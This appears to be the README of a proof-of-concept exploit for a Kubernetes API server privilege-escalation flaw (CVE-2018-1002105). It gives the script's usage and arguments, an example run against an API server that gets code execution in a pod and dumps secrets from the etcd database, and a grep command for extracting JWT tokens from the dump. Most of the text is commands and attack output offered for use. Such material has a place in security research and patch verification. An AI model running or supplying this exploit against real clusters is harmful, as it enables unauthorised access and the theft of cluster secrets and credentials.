Proof-of-Concept exploit for CVE-2018-1002105. The current exploit requires create
and get
privileges on pods
and pods/exec
. If you do not know what that means, this is probably not meant for you. :)
The current PoC dumps the secrets from the default etcd-kubernetes
container.
The PoC in action:
usage: poc.py [-h] --target TARGET [--jwt TOKEN] [--namespace NAMESPACE] --pod
POD
PoC for CVE-2018-1002105.
optional arguments:
-h, --help show this help message and exit
--target TARGET, -t TARGET
API server target:port
--jwt TOKEN, -j TOKEN
JWT token for service account
--namespace NAMESPACE, -n NAMESPACE
Namespace with exec access
--pod POD, -p POD Pod with exec access
Example:
$ ./poc.py -t 10.0.2.15:6443 --jwt [token]
[*] Building pipe...
[+] Pipe opened :D
[*] Attempting code exec in pod
[*] Dumping secrets in etcd.db....
[+] Done dumping secrets!
Check for tokens:
$ grep -air eyJ etcd.db